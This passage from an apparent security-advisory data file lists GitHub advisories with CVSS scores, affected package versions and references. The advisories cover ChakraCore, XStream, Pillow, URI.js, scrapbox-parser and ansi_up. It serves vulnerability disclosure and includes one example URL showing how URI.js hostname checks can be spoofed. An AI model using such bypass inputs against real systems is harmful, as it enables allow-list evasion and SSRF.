'WEB', 'url': 'https://lists.apache.org/thread.html/r27b7e5a588ec826b15f38c40be500c50073400019ce7b8adfd07fece@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2e93ce23e04c3f0a61e987d1111d0695cb668ac4ec4edbf237bd3e80@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r312ce5bd3c6bf08c138349b507b6f1c25fe9cf40b6f2b0014c9d12b1@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r32b0b640ad2be3b858f0af51c68a7d5c5a66a462c8bbb93699825cd3@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r33eb06b05afbc7df28d31055cae0cb3fd36cab808c884bf6d680bea5@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r393a339ab0b63ef9e6502253eeab26e7643b3e69738d5948b2b1d064@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c293431c781696681abbfe1c573c2d9dcdae6fd3ff330ea22f0433f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3c4596b9b37f5ae91628ccf169d33cd5a0da4b16b6c39d5bad8e03f3@%3Cdev.jackrabbit.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3ff9e735ca33612d900607dc139ebd38a64cadc6bce292e53eb86d7f@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r490ca5611c150d193b320a2608209180713b7c68e501b67b0cffb925@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4ea2f1a9d79d4fc1896e085f31fb60a21b1770d0a26a5250f849372d@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5232e33a1f3b310a3e083423f736f3925ebdb150844d60ac582809f8@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5470456cf1409a99893ae9dd57439799f6dc1a60fda90e11570f66fe@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r57245853c7245baab09eae08728c52b58fd77666538092389cc3e882@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5baac01f9e06c40ff7aab209d5751b3b58802c63734e33324b70a06a@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5fc5786cdd640b1b0a3c643237ce0011f0a08a296b11c0e2c669022c@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r602e98daacc98934f097f07f2eed6eb07c18bfc1949c8489dc7bfcf5@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67c4f90658fde875521c949448c54c98517beecdc7f618f902c620ec@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r67e6a636cbc1958383a1cd72b7fd0cd7493360b1dd0e6c12f5761798@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a122c25e352eb134d01e7f4fc4d345a491c5ee9453fef6fc754d15b@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a29316d758db628a1df49ca219d64caf493999b52cc77847bfba675@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6aee7e3566cb3e51eeed2fd8786704d91f80a7581e00a787ba9f37f6@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6d32fc3cd547f7c9a288a57c7f525f5d00a00d5d163613e0d10a23ef@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r70cebada51bc6d49138272437d8a28fe971d0197334ef906b575044c@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r837bbcbf12e335e83ab448b1bd2c1ad7e86efdc14034b23811422e6a@%3Ccommits.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r855b4b6814ac829ce2d48dd9d8138d07f33387e710de798ee92c011e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r86cd38a825ab2344f3e6cad570528852f29a4ffdf56ab67d75c36edf@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8bcaf7821247b1836b10f6a1a3a3212b06272fd4cde4a859de1b78cf@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8db1d7b3b9acc9e8d2776395e280eb9615dd7790e1da8c57039963de@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9051e4f484a970b5566dc1870ecd9c1eb435214e2652cf3ea4d0c0cc@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r905b92099998291956eebf4f1c5d95f5a0cbcece2946cc46d32274fd@%3Cdev.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r96ce18044880c33634c4b3fcecc57b8b90673c9364d63eba00385523@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra64d56a8a331ffd7bdcd24a9aaaeeedeacd5d639f5a683389123f898@%3Cdev.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra655e5cec74d1ddf62adacb71d398abd96f3ea2c588f6bbf048348eb@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra83096bcbfe6e1f4d54449f8a013117a0536404e9d307ab4a0d34f81@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra96c74c37ed7252f78392e1ad16442bd16ae72a4d6c8db50dd55c88b@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/racc191a1f70a4f13155e8002c61bddef2870b26441971c697436ad5d@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rae198f44c3f7ac5264045e6ba976be1703cff38dcf1609916e50210d@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb523bb6c60196c5f58514b86a8585c2069a4852039b45de3818b29d2@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb95d42ce220ed4a4683aa17833b5006d657bc4254bc5cb03cd5e6bfb@%3Cissues.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbadcbcb50195f00bbd196403865ced521ca70787999583c07be38d0e@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbed09768f496244a2e138dbbe6d2847ddf796c9c8ef9e50f2e3e30d9@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc165e36ca7cb5417aec3f21bbc4ec00fb38ecebdd96a82cfab9bd56f@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc73b8dd01b1be276d06bdf07883ecd93fe1a01f139a99ef30ba4308c@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rca0978b634a0c3ebee4126ec29c7f570b165fae3f8f3658754c1cbd3@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcf3752209a8b04996373bf57fdc808b3bfaa2be8702698a0323641f8@%3Ccommits.hbase.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcfc154eb2de23d2dc08a56100341161e1a40a8ea86c693735437e8f2@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcfc535afd413d9934d6ee509dce234dac41fa3747a7555befb17447e@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd25c88aad0e76240dd09f0eb34bdab924933946429e068a167adcb73@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd4a6b7dec38ea6cd28b6f94bd4b312629a52b80be3786d5fb0e474bc@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdb4db3f5a9c478ca52a7b164680b88877a5a9c174e7047676c006b2c@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdc096e13ac4501ea2e2b03a197682a313b85d3d3ec89d5ae5551b384@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rddbb4f8d5db23265bb63d14ef4b3723b438abc1589f877db11d35450@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re4f70b62843e92163fab03b65e2aa8078693293a0c36f1cc260079ed@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re6207ebe2ca4d44f2a6deee695ad6f27fd29d78980f1d46ed1574f91@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re7c69756a102bebce8b8681882844a53e2f23975a189363e68ad0324@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/reafc834062486adfc7be5bb8f7b7793be0d33f483678a094c3f9d468@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf36f1114e84a3379b20587063686148e2d5a39abc0b8a66ff2a9087a@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf87b870a22aa5c77c27900967b518a71a7d954c2952860fce3794b60@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf934292a4a1c189827f625d567838d2c1001e4739b158638d844105b@%3Cissues.kudu.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rfff6ff8ffb31e8a32619c79774def44b6ffbb037c128c5ad3eab7171@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210604-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}]","{'cwe_ids': ['CWE-444'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-09T18:47:09Z', 'nvd_published_at': '2021-03-09T19:15:00Z'}"
+1.4.0,GHSA-fm9p-5m9f-rq85,2021-03-18T21:46:47Z,2021-03-29T21:00:03Z,,['CVE-2019-0915'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933, CVE-2019-0937.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0915'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d85b5025b047f10784c53c6c1dd771775d417f5f'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0915'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T21:46:47Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-74cv-f58x-f9wf,2022-02-08T21:32:55Z,2021-03-22T23:28:13Z,,['CVE-2021-21343'],XStream is vulnerable to an Arbitrary File Deletion on the local host when unmarshalling as long as the executing process has sufficient rights,"### Impact
+The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that result in the deletion of a file on the local host. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.
+
+### Patches
+If you rely on XStream's default blacklist of the [Security Framework](https://x-stream.github.io/security.html#framework), you will have to use at least version 1.4.16.
+
+### Workarounds
+See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs.
+
+### References
+See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-21343](https://x-stream.github.io/CVE-2021-21343.html).
+
+### Credits
+钟潦贵 (Liaogui Zhong) found and reported the issue to XStream and provided the required information to reproduce it.
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [XStream](https://github.com/x-stream/xstream/issues)
+* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.16'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-74cv-f58x-f9wf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21343'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r8244fd0831db894d5e89911ded9c72196d395a90ae655414d23ed0dd@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9ac71b047767205aa22e3a08cb33f3e0586de6b2fac48b425c6e16b0@%3Cdev.jmeter.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/04/msg00002.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210430-0002/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-21343.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/security.html#workaround'}, {'type': 'WEB', 'url': 'http://x-stream.github.io/changes.html#1.4.16'}]","{'cwe_ids': ['CWE-502', 'CWE-73'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T23:23:36Z', 'nvd_published_at': '2021-03-23T00:15:00Z'}"
+1.4.0,GHSA-95q3-8gr9-gm8w,2023-09-04T16:25:25Z,2021-03-18T19:54:43Z,,['CVE-2021-27923'],Pillow Denial of Service by Uncontrolled Resource Consumption,"Pillow before 8.1.1 allows attackers to cause a denial of service (memory consumption) because the reported size of a contained image is not properly checked for an ICO container, and thus an attempted memory allocation can be very large.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27923'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/S7G44Z33J4BNI2DPDROHWGVG2U7ZH5JU/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TQQY6472RX4J2SUJENWDZAWKTJJGP2ML/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZTSY25UJU7NJUFHH3HWT575LT4TDFWBZ/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.1.1.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-12T23:37:20Z', 'nvd_published_at': '2021-03-03T09:15:00Z'}"
+1.4.0,GHSA-8gvg-8vhf-h26g,2021-03-18T22:16:06Z,2021-03-29T20:59:03Z,,['CVE-2019-0937'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-0912, CVE-2019-0913, CVE-2019-0914, CVE-2019-0915, CVE-2019-0916, CVE-2019-0917, CVE-2019-0922, CVE-2019-0923, CVE-2019-0924, CVE-2019-0925, CVE-2019-0927, CVE-2019-0933.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.9'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-0937'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/7827e117753052d479fabe19a25cfece88059bca'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/d797e3f00e34c12c8c0ae52f56344325439dccd7'}, {'type': 'WEB', 'url': 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0937'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T22:16:06Z', 'nvd_published_at': '2019-05-16T19:29:00Z'}"
+1.4.0,GHSA-p6j9-7xhc-rhwp,2023-09-07T20:24:16Z,2021-03-01T20:03:53Z,,['CVE-2021-27516'],URIjs Hostname spoofing via backslashes in URL,"### Impact
+If using affected versions to determine a URL's hostname, the hostname can be spoofed by using a backslash (`\`) character as part of the scheme delimiter, e.g. `scheme:/\hostname`. If the hostname is used in security decisions, the decision may be incorrect.
+
+Depending on library usage and attacker intent, impacts may include allow/block list bypasses, SSRF attacks, open redirects, or other undesired behavior.
+
+Example URL: `https:/\expected-example.com/path`
+Escaped string: `https:/\\expected-example.com/path` (JavaScript strings must escape backslash)
+
+Affected versions incorrectly return no hostname. Patched versions correctly return `expected-example.com`. Patched versions match the behavior of other parsers which implement the [WHATWG URL specification](https://url.spec.whatwg.org/), including web browsers and [Node's built-in URL class](https://nodejs.org/api/url.html).
+
+### Patches
+Version 1.19.6 is patched against all known payload variants.
+
+### References
+https://github.com/medialize/URI.js/releases/tag/v1.19.6 (fix for this particular bypass)
+https://github.com/medialize/URI.js/releases/tag/v1.19.4 (fix for related bypass)
+https://github.com/medialize/URI.js/releases/tag/v1.19.3 (fix for related bypass)
+[PR #233](https://github.com/medialize/URI.js/pull/233) (initial fix for backslash handling)
+
+### For more information
+If you have any questions or comments about this advisory, open an issue in https://github.com/medialize/URI.js
+
+### Reporter credit
+[Yaniv Nizry](https://twitter.com/ynizry) from the CxSCA AppSec team at Checkmarx","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'urijs'}, 'ecosystem_specific': {'affected_functions': ['urijs.parse']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.19.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/security/advisories/GHSA-p6j9-7xhc-rhwp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27516'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/commit/a1ad8bcbc39a4d136d7e252e76e957f3ece70839'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4305'}, {'type': 'PACKAGE', 'url': 'https://github.com/medialize/URI.js'}, {'type': 'WEB', 'url': 'https://github.com/medialize/URI.js/releases/tag/v1.19.6'}]","{'cwe_ids': ['CWE-20'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T21:37:41Z', 'nvd_published_at': '2021-02-22T00:15:00Z'}"
+1.4.0,GHSA-9fhw-r42p-5c7r,2021-02-26T19:49:07Z,2021-03-01T20:44:44Z,,['CVE-2021-27405'],Regular expression Denial of Service in @progfay/scrapbox-parser,"### Impact
+
+A [Regular expression Denial of Service](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS) flaw was found in the @progfay/scrapbox-parser package before 6.0.3, 7.0.2 for Node.js.
+The attacker that is able to be parsed a specially crafted text may cause the application to consume an excessive amount of CPU.
+
+### Patches
+
+Upgrade to version 6.0.3, 7.0.2 or later.
+
+### Workarounds
+
+Avoid to parse text with a lot of `[` chars.
+
+### References
+
+* https://github.com/progfay/scrapbox-parser/pull/519
+* https://github.com/progfay/scrapbox-parser/pull/539
+* https://github.com/progfay/scrapbox-parser/pull/540
+* https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-27405
+* https://snyk.io/vuln/SNYK-JS-PROGFAYSCRAPBOXPARSER-1076803
+
+### For more information
+If you have any questions or comments about this advisory:
+* Open an issue in [github.com/progfay/scrapbox-parser](https://github.com/progfay/scrapbox-parser/issues)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': '@progfay/scrapbox-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.0.3'}]}]}, {'package': {'ecosystem': 'npm', 'name': '@progfay/scrapbox-parser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/security/advisories/GHSA-9fhw-r42p-5c7r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-27405'}, {'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/pull/519'}, {'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/pull/539'}, {'type': 'WEB', 'url': 'https://github.com/progfay/scrapbox-parser/pull/540'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210326-0002/'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-26T19:49:07Z', 'nvd_published_at': '2021-02-19T05:15:00Z'}"
+1.4.0,GHSA-2v5f-23xc-v9qr,2023-09-13T22:25:15Z,2021-03-11T22:50:39Z,,['CVE-2021-3377'],ansi_up cross-site scripting vulnerability,"The npm package ansi_up converts ANSI escape codes into HTML. In ansi_up v4, ANSI escape codes can be used to create HTML hyperlinks. Due to insufficient URL sanitization, this feature is affected by a cross-site scripting (XSS) vulnerability. This issue is fixed in v5.0.0.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ansi_up'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3377'}, {'type': 'WEB', 'url': 'https://github.com/drudru/ansi_up/commit/c8c726ed1db979bae4f257b7fa41775155ba2e27'}, {'type': 'WEB', 'url': 'https://doyensec.com/resources/Doyensec_Advisory_ansi_up4_XSS.pdf'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-11T22:49:55Z', 'nvd_published_at': '2021-03-05T21:15:00Z'}"
+1.4.0,GHSA-p23j-g745-8449,2021-03-23T15:25:28Z,2021-03-29T20:55:40Z,,['CVE-2019-1335'],Out-of-bounds write,"A remote code execution vulnerability exists in the way that the Chakra scripting engine handles objects in memory in Microsoft Edge, aka 'Chakra Scripting Engine Memory Corruption Vulnerability'. This CVE ID is unique from CVE-2019-1307, CVE-2019-1308, CVE-2019-1366.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'NuGet', 'name': 'Microsoft.ChakraCore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.11.14'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-1335'}, {'type': 'WEB', 'url': 'https://github.com/chakra-core/ChakraCore/commit/a4e56547fb8b7450656bfd26dfc52b8477c8ef27'}, {'type': 'WEB', 'url': 